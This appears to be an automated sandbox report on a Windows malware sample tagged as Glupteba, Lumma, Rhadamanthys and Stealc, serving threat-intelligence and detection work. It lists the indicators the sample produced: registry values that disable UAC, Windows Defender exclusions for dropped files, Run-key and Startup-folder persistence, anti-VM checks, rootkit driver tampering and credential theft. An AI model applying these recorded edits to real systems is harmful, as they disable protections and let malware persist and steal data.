Malware Analysis Report

2024-11-30 02:12

Sample ID 240329-ca85qafa57
Target adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8
SHA256 adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8
Tags
glupteba lumma rhadamanthys discovery dropper evasion loader persistence rootkit spyware stealer trojan upx stealc themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8

Threat Level: Known bad

The file adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8 was found to be: Known bad.

Malicious Activity Summary

glupteba lumma rhadamanthys discovery dropper evasion loader persistence rootkit spyware stealer trojan upx stealc themida

UAC bypass

Modifies firewall policy service

Lumma Stealer

Rhadamanthys

Glupteba payload

Stealc

Glupteba

Detects DLL dropped by Raspberry Robin.

Suspicious use of NtCreateUserProcessOtherParentProcess

Windows security bypass

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Modifies boot configuration data using bcdedit

Drops file in Drivers directory

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Downloads MZ/PE file

Drops startup file

Themida packer

Checks BIOS information in registry

Executes dropped EXE

Reads user/profile data of web browsers

Reads user/profile data of local email clients

UPX packed file

Reads data files stored by FTP clients

Loads dropped DLL

Windows security modification

Accesses cryptocurrency files/wallets, possible credential harvesting

Checks installed software on the system

Manipulates WinMon driver.

Adds Run key to start application

Checks whether UAC is enabled

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Manipulates WinMonFS driver.

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Checks for VirtualBox DLLs, possible anti-VM trick

Launches sc.exe

Drops file in Windows directory

Enumerates physical storage devices

Program crash

Suspicious behavior: LoadsDriver

Checks SCSI registry key(s)

Suspicious use of WriteProcessMemory

System policy modification

Runs ping.exe

Checks processor information in registry

Modifies data under HKEY_USERS

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Creates scheduled task(s)

Suspicious behavior: EnumeratesProcesses

Modifies system certificate store

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-29 01:53

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-29 01:53

Reported

2024-03-29 01:58

Platform

win10-20240221-en

Max time kernel

296s

Max time network

300s

Command Line

sihost.exe

Signatures

Detects DLL dropped by Raspberry Robin.

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Lumma Stealer

stealer lumma

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 1936 created 2792 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe c:\windows\system32\sihost.exe

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3XJHnNSbGYA02GO7UhIuxYV7.exe = "0" C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ubInWILwqwzq0r3tkzEDMPsx.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VMpmSW5lQOTKnoodNjiG90GW.exe = "0" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c6Ujx0FkgOujLIpvEvgPzZBG.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\brVPYbA4vLmXsiZt6ngzy9gS.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9ClPaaTfFSjJ7F2XS18kucrz.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fSmmYIjftUxBkWVBxLq14JjW.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\6zcnIu6wqBi9RsyxK6bvDaEC.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sebgSUOeCLmirLq2CeGcWdVf.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RpQHv5Sw4dQflCppsKI0rkHn.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TlE204QOpxj4AZibtawQYM6E.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ItLWQfghVwTQjVucLwFzPNFl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HMuhMS13n2wzY7CCUZBNbdMv.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\r4NV2TWvJkrc6GurGOnktxvb.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\FdjdWrURr0pbDSTy4jBjFKsX.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\SkWMGGpeI3TJBXP1ZRAyaf4U.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\YpBqfcPhJaYRxzNaLOsZMlvh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe N/A
N/A N/A C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
N/A N/A C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
N/A N/A C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
N/A N/A C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\GCGCBAECFC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\Assistant_108.0.5067.20_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202403290154511\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\wup\xarch\wup.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\ubInWILwqwzq0r3tkzEDMPsx.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\3XJHnNSbGYA02GO7UhIuxYV7.exe = "0" C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\VMpmSW5lQOTKnoodNjiG90GW.exe = "0" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3281913400-1494313570-2321515684-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\adffd52446d0d94c4f726205482a0c062248d6eb35948df937336957cf747db8.exe N/A
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\PHdHLeuB5m5LNlcNnVsyRe83.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\uSEC49v5Ra5WAKyOQGf1eIdn.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\ubInWILwqwzq0r3tkzEDMPsx.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\3XJHnNSbGYA02GO7UhIuxYV7.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2sg.1.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\u2sg.0.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-435 = "Georgian Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-201 = "US Mountain Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2531 = "Chatham Islands Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-562 = "SE Asia Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1931 = "Russia TZ 11 Daylight Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-431 = "Iran Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-191 = "Mountain Daylight Time" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1972 = "Belarus Standard Time" C:\Windows\windefender.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)" C:\Users\Admin\Pictures\VMpmSW5lQOTKnoodNjiG90GW.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
